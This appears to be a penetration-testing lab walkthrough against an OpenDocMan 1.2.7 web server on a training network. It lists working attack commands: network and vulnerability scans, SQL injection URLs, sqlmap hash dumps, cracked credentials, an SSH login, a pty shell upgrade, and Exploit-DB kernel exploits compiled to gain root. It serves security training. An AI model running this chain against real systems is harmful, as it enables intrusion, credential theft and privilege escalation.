QuickLab

1. Use Putty to SSH into my Ubuntu host in order to perform the lab tasks below.
2.  
3. You can download Putty from here:
4. http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
5.  
6.  
7. IP Address: 45.76.254.222
8. Protocol: ssh
9. Port: 22
10. username: ceh
11. password:
12.  
13.  
14. Attack steps:
15. -------------
16.  
17.  
18.  
19. Step 1: Ping sweep the target network
20. -------------------------------------
21.  
22.  
23. ---------------------------Type This-----------------------------------
24. nmap -sP 172.31.2.0/24
25. -----------------------------------------------------------------------
26.  
27.  
28.  
29. - Found 3 hosts
30. 172.31.2.64
31. 172.31.2.217
32. 172.31.2.238
33.  
34.  
35.  
36. Step 2: Port scan target system
37. -------------------------------
38.  
39.  
40. ---------------------------Type This-----------------------------------
41. nmap -sV 172.31.2.64
42. -----------------------------------------------------------------------
43.  
44.  
45.  
46. -------------Scan Results--------------------------------------------
47. PORT STATE SERVICE VERSION
48. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
49. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
50. 514/tcp filtered shell
51. 1037/tcp filtered ams
52. 6667/tcp open irc ngircd
53. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
54. --------------------------------------------------------------------
55.  
56.  
57. Step 3: Vulnerability Scan the webserver
58. ----------------------------------------
59.  
60.  
61. ---------------------------Type This-----------------------------------
62. cd ~/toolz/Nikto2/program
63.  
64. perl nikto.pl -h 172.31.2.64
65. -----------------------------------------------------------------------
66.  
67.  
68. Step 4: Run dirbuster or similar directory bruteforce tool against the target
69. -----------------------------------------------------------------------------
70.  
71.  
72. ---------------------------Type This-----------------------------------
73. cd ~/toolz/dirb/
74.  
75.  
76. ./dirb http://172.31.2.64 wordlists/big.txt
77. -----------------------------------------------------------------------
78.  
79.  
80.  
81. Step 5: Browse the web site to look for clues
82. ---------------------------------------------
83. To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
84. https://54.245.178.32/?src=connect
85.  
86. Accept the security exception and enter one of the following user names:
87.  
88. username: labuser001
89. username: labuser002
90. username: labuser003
91. username: labuser004
92. username: labuser005
93. username: labuser006
94. username: labuser007
95. username: labuser008
96. username: labuser009
97. username: labuser010
98. username: labuser011
99. username: labuser012
100. username: labuser013
101. username: labuser014
102. username: labuser015
103. username: labuser016
104. username: labuser017
105. username: labuser018
106. username: labuser019
107. username: labuser020
108.  
109.  
110.  
111. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
112.  
113.  
114. ..... really didn't get much from here so we just opened the web page in a browser
115. http://172.31.2.64/
116.  
117. .....browsed to the webpage and saw that it pointed to:
118. http://172.31.2.64/jabc
119.  
120. ....clicked on documentation link and found hidden text that pointed to here:
121. http://172.31.2.64/jabcd0cs/
122.  
123. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
124. https://www.exploit-db.com/exploits/32075/
125.  
126. Tried the sql injection described in exploit-db:
127. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
128.  
129. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
130.  
131.  
132.  
133. Tried to run sqlmap against the target
134.  
135.  
136. ---------------------------Type This-----------------------------------
137. cd ~/toolz/sqlmap-dev/
138. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
139.  
140. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
141.  
142. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
143.  
144. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
145.  
146. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
147. -----------------------------------------------------------------------
148.  
149.  
150.  
151. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
152. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
153.  
154.  
155.  
156. ---------------------------Type This-----------------------------------
157. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
158.  
159. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
160. -----------------------------------------------------------------------
161.  
162. username: webmin
163. hash: b78aae356709f8c31118ea613980954b
164.  
165. https://hashkiller.co.uk/md5-decrypter.aspx
166.  
167. hash: b78aae356709f8c31118ea613980954b
168. pass: webmin1980
169.  
170.  
171. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
172.  
173.  
174.  
175. ---------------------------Type This-----------------------------------
176. ssh -l webmin 172.31.2.64
177. webmin1980
178.  
179. id
180.  
181. cat /etc/*release
182. -----------------------------------------------------------------------
183.  
184.  
185.  
186. ....tired of not having a real command shell...
187.  
188.  
189. ---------------------------Type This-----------------------------------
190. python -c 'import pty;pty.spawn("/bin/bash")'
191.  
192.  
193. cd /tmp
194.  
195. pwd
196.  
197.  
198. cat >> exploit.c << out
199.  
200. **************paste in the content from here *****************
201. https://www.exploit-db.com/raw/39166/
202.  
203.  
204. ------ hit enter a few times ------
205.  
206. ------ then type 'out' ----- this closes the file handle...
207.  
208.  
209.  
210. ---------------------------Type This-----------------------------------
211. gcc -o boom exploit.c
212.  
213. ./boom
214. -----------------------------------------------------------------------
215.  
216.  
217. ------------exploit failed, damn let's try another one ---------
218.  
219.  
220.  
221. ---------------------------Type This-----------------------------------
222. cat >> exploit2.c << out
223.  
224. **************paste in the content from here *****************
225. https://www.exploit-db.com/raw/37292/
226.  
227.  
228. out
229.  
230.  
231. gcc -o boom2 exploit2.c
232.  
233. ./boom2
234.  
235. id
236.  
237.  
238. ......YEAH - do the happy dance!!!!